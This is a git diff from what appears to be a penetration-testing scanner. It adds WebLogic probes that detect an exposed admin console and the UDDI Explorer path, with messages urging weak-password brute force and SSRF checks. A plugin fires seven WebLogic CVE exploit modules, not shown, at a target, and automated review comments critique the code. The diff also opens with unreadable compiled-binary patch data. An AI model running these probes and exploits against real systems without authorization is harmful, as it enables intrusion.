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 literal 0 HcmV?d00001 diff --git a/plugins/weblogic_poc/__pycache__/__init__.cpython-37.pyc b/plugins/weblogic_poc/__pycache__/__init__.cpython-37.pyc new file mode 100644 index 0000000000000000000000000000000000000000..e71ff90487184bf21e1c0004fc444a2acec002b4 GIT binary patch literal 447 zcmZXR!D_=W42GRBSPAqUd|Lx;eIKEW(d&9Cy9|St*``ZL6O*)*g5P9MuvhAJZ?V&U zIm<2+_?M;6vV{FOon``-&Oh`z5#o!3(GZIVtbPKq;zihGEAq6w0mvl5doS*vbJ{TvU6KgHvbd8KJBWe*Jt-ux4X)aZw)$DO?4z%`pb1v O99ny--HN}g#}YsL-+4g* literal 0 HcmV?d00001 
diff --git a/plugins/weblogic_poc/__pycache__/managerURL200.cpython-37.pyc b/plugins/weblogic_poc/__pycache__/managerURL200.cpython-37.pyc new file mode 100644 index 0000000000000000000000000000000000000000..62b47651a9260b69d736d719ca78c747ddbe6459 GIT binary patch literal 1270 zcmah}&u`pB6rLH|yN=UTRjVqhl*8uKE|B%YaTQfnK|PfmsOZ5M4aPGhyX@L##%`6= zk&s%^AOSsbfmBUZBt#D+po$_uJ@YsCN}Xi?g^C03&1NGcBswd9@6G$>$G6{%eR*!q zBhWnmLHM^t$Y0o*Ht3T}@aO4e%3A;}NOE{u&hXl503Kyay8)D{T zrmjmmXbSHf30yg2^4W9bHVr)KNLPBd86|>UBkdE>30;NFCES$dF!% zNr((DTP1`EUf^x$0U7!&C?O4iLmI`(&rd4xIMnWpxb}CEf zs&bY5q>wt-m9;8!h1aE;)p?W`n#ZY-ZM$NHs_ZOPd1V!9SW)!@Q72&Bi{PzZn61Za zks2*!Djmo;4_B7n?h7%LHzOsl#ZmI#LN+Wwk`8am4^d*wvosDzQ35Whci*}CMz`C^ z)~iNe5BoRdDfFcQK%CXsKlt{?{hhnhzqbF?_x08< z^}W4%d#}F#>HarQ#@jzHdNA(r>2Ce(&huY?>)qNk{oSXBcOM@<{G#5wf4KW~{l`!B zy+_Y~|L$PxvxA){i^VIr{L)L7-+sLR`LlX!Z?SC~qZFD`IhpDwdDZv`Eo_%t20I4l9-_lCzL#7l44{3-lCIXOMC^A4UCy^D(^WWQ?A)XR9XXB8@qR+qABg z14VO(Ci_q4CDBO25Ia(#)lka7BE7S@3-kbNm$$NbBc2A9t+5}eBeeV4* z2>FSd;etIm32)K>5Tro_6|6-Yw6Ltfgdxn3HVjb`<#p09MMYR(OR_9RZZLI8(xr;9 z50Hi>M+(1sfZU@ETb86H?R$(8!4^n;k3T{Qu^kS}>94*WB3h(&XiO?dJ444qhG$L& zrjHZ64m%({*MShy0GI*>4rRc*4!;WfLvVhG$O7rP00j+z0oQT+m1doZ;v;yz{}sTZ z64XK$X%EVI(BZ6OV-FsOz!9GDDbC#?W)LeH1Q^i3qHp&=Z8E=Vr-@XPep7bzYBi9_ zV(3m!O-~&S81k^p!Fw8PG7TW8CK(7k2C|M3@M+;2V`PnKy2LW3;lduWH6t^YOc1^_ zzgk(;I-YUeKXhib=B7e~@^;*clvHk==9NY13#pQNDK`?Wa!bjZsZ4Z|8%?Pd4oF^2 zw6D{I2a%9P`gSAs=fwI^d0Ey+N8^ONU7AzJd5 zujE4Dcm5B=t+W|-67QD0){2^8z~diSf?l9$7z6)wxYs6rWl(1WzbR1Lfx zsZcWH3aL(kgF=BkOi-B9;~M7r1x&Lx2J)F8pD~cHG)7*6kd$;R$Sb2K2#8mi?|p|a zrRM=IAHMSY$@}dW_lIq6y?ea%^!3HLxwF4F*MDt(9Je8*`)OnA+xoB1UuN#C75j}( z-TQC5FCX;YKIm@TU0AqqX8Y@-?GMk!cdkWY=esW^J%%MGca?PhRqJg&?!JFDEcdYA z%y``_M9E9B3OhP4UyoGV*9ym|&J_L)s1XFbtv-x`mm4bW><4EcZjDYbwGRo4^R^#$ zIPbx)m-MjHdNr?bE~0>Q7?_nrl^|G*Nl|*|T*q%qNHKlYTrMi-2DG%he9=hJgEiZZ YMB0)ku*(Fio7AEfgQpA+wP}t11w!CcPyhe` literal 0 HcmV?d00001 
diff --git a/plugins/weblogic_poc/managerURL200.py b/plugins/weblogic_poc/managerURL200.py
new file mode 100644
index 0000000..7530763
--- /dev/null
+++ b/plugins/weblogic_poc/managerURL200.py
@@ -0,0 +1,32 @@
+#!/usr/bin/env python
+# _*_ coding:utf-8 _*_
+'''
+ ____ _ _ _ _ __ __ _
+| _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __
+| |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ /
+| _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ <
+|_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\
+
+'''
+import sys
+import requests
+
+headers = {'user-agent': 'ceshi/0.0.1'}
+
+def islive(ur,port):
+ url='http://' + str(ur)+':'+str(port)+'/console/login/LoginForm.jsp'
+ r = requests.get(url, headers=headers)
+ return r.status_code
+
+def run(url,port):
+ if islive(url,port)==200:
+ u='http://' + str(url)+':'+str(port)+'/console/login/LoginForm.jsp'
+ print(("[+]目标weblogic控制台地址暴露!\n[+]路径为:{}\n[+]请自行尝试弱口令爆破!".format(u)))
+ else:
+ print("[-]目标weblogic控制台地址未找到!")
+
+if __name__=="__main__":
+ url = sys.argv[1]
+ port = int(sys.argv[2])
+ run(url,port)
+ # run('127.0.0.1',7001)
\ No newline at end of file
diff --git a/plugins/weblogic_poc/uddi_ssrf.py b/plugins/weblogic_poc/uddi_ssrf.py
new file mode 100644
index 0000000..282bbcb
--- /dev/null
+++ b/plugins/weblogic_poc/uddi_ssrf.py
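Review bot: `requests.get(url, headers=headers)` in `islive` sets no `timeout`, so a host that accepts the connection and never answers blocks the whole scan indefinitely (requests has no default timeout); pass one, e.g. `r = requests.get(url, headers=headers, timeout=5)`. With the default `allow_redirects=True` a redirect from the login page to some other page that returns 200 also counts as "exposed", which is presumably not intended — `allow_redirects=False` would make the 200 check mean what the printed message says. A connection error raises out of `islive` unhandled, which is acceptable only because the caller catches it; a docstring line stating that contract would help. The same missing timeout is in the uddi_ssrf.py hunk below.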
@@ -0,0 +1,31 @@
+#!/usr/bin/env python
+# _*_ coding:utf-8 _*_
+'''
+ ____ _ _ _ _ __ __ _
+| _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __
+| |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ /
+| _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ <
+|_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\
+
+'''
+import sys
+import requests
+
+headers = {'user-agent': 'ceshi/0.0.1'}
+
+def islive(ur,port):
+ url='http://' + str(ur)+':'+str(port)+'/uddiexplorer/'
+ r = requests.get(url, headers=headers)
+ # print(url,r.status_code)
+ return r.status_code
+
+def run(url,port):
+ if islive(url,port)==200:
+ print(('[+]目标weblogic存在UDDI组件!\n[+]路径为:{}\n[+]请自行验证SSRF漏洞!'.format('http://' + str(url)+':'+str(port)+'/uddiexplorer/')))
+ else:
+ print("[-]目标weblogic UDDI组件默认路径不存在!")
+
+if __name__=="__main__":
+ url = sys.argv[1]
+ port = int(sys.argv[2])
+ run(url,port)
\ No newline at end of file
diff --git a/plugins/weblogic_special_plugin_.py b/plugins/weblogic_special_plugin_.py
new file mode 100644
index 0000000..81dfa86
--- /dev/null
+++ b/plugins/weblogic_special_plugin_.py
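Review bot: The commented-out debug line `# print(url,r.status_code)` in `islive` should be removed rather than committed; if the status is useful for troubleshooting, log it through a logger at debug level instead. The header banner, `headers` dict, `islive` and the `__main__` block are copied almost verbatim from managerURL200.py, which suggests the two checks belong in one module with the probed path as a parameter. A bare 200 on `/uddiexplorer/` is presumably also returned by catch-all handlers, so confirming the body looks like the UDDI Explorer page before printing the finding would make the result more reliable.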
@@ -0,0 +1,51 @@
+#coding=utf-8
+from plugins.weblogic_poc import CVE_2015_4852
+from plugins.weblogic_poc import CVE_2016_0638
+from plugins.weblogic_poc import CVE_2016_3510
+from plugins.weblogic_poc import CVE_2017_3248
+from plugins.weblogic_poc import CVE_2017_3506
+from plugins.weblogic_poc import CVE_2018_2628
+from plugins.weblogic_poc import CVE_2018_2893
+from plugins.weblogic_poc import managerURL200
+from plugins.weblogic_poc import uddi_ssrf
+import socket
+def weblogic_special_plugin_(arg,config):
+ port=7001
+ ip=socket.gethostbyname(arg.url.strip("http://").strip("https://"))
+ #print(arg.url)
+ try:
+ CVE_2015_4852.run(ip,port)
+ except Exception:
+ print("CVE_2015_4852 脚本出错")
+ try:
+ CVE_2016_0638.run(ip,port,0)
+ except Exception:
+ print("CVE_2016_0638 脚本出错")
+ try:
+ CVE_2016_3510.run(ip,port,0)
+ except Exception:
+ print("CVE_2016_3510 脚本出错")
+ try:
+ CVE_2017_3248.run(ip,port,0)
+ except Exception:
+ print("CVE_2017_3248 脚本出错")
+ try:
+ CVE_2017_3506.run(ip,port)
+ except Exception:
+ print("CVE_2017_3506 脚本出错")
+ try:
+ CVE_2018_2893.run(ip,port,0)
+ except Exception:
+ print("CVE_2018_2893 脚本出错")
+ try:
+ CVE_2018_2628.run(ip,port,0)
+ except Exception:
+ print("CVE_2018_2628 脚本出错")
+ try:
+ managerURL200.run(ip,port)
+ except Exception:
+ print("managerURL200 脚本出错")
+ try:
+ uddi_ssrf.run(ip,port)
+ except Exception:
+ print("uddi_ssrf 脚本出错")
\ No newline at end of file
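Review bot: `arg.url.strip("http://").strip("https://")` does not remove a prefix; `str.strip` deletes any leading and trailing characters from the set {h, t, p, s, :, /}, so a target such as `http://host.net` becomes `ost.ne` and a URL carrying a path or `:port` is not handled at all. Parse the URL with `urllib.parse.urlparse` (adding `from urllib.parse import urlparse` to the imports) and take the host from it; the hard-coded `port=7001` can then also defer to the port given in the URL. `socket.gethostbyname` sits outside every `try`, so a resolution failure raises out of the plugin instead of being reported like the PoC errors are; wrapping it, or catching `socket.gaierror` and returning early, keeps the plugin's failure mode consistent. The nine `try`/`except Exception: print(...)` blocks are identical apart from the module and argument list; a single loop over a list of `(module, extra_args)` tuples, with `logger.exception` instead of `print` so the actual error is preserved, would replace them.
```python
def weblogic_special_plugin_(arg,config):
    parsed = urlparse(arg.url if "://" in arg.url else "http://" + arg.url)
    port = parsed.port or 7001
    ip = socket.gethostbyname(parsed.hostname)
    # … unchanged: per-PoC try/except blocks …
```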
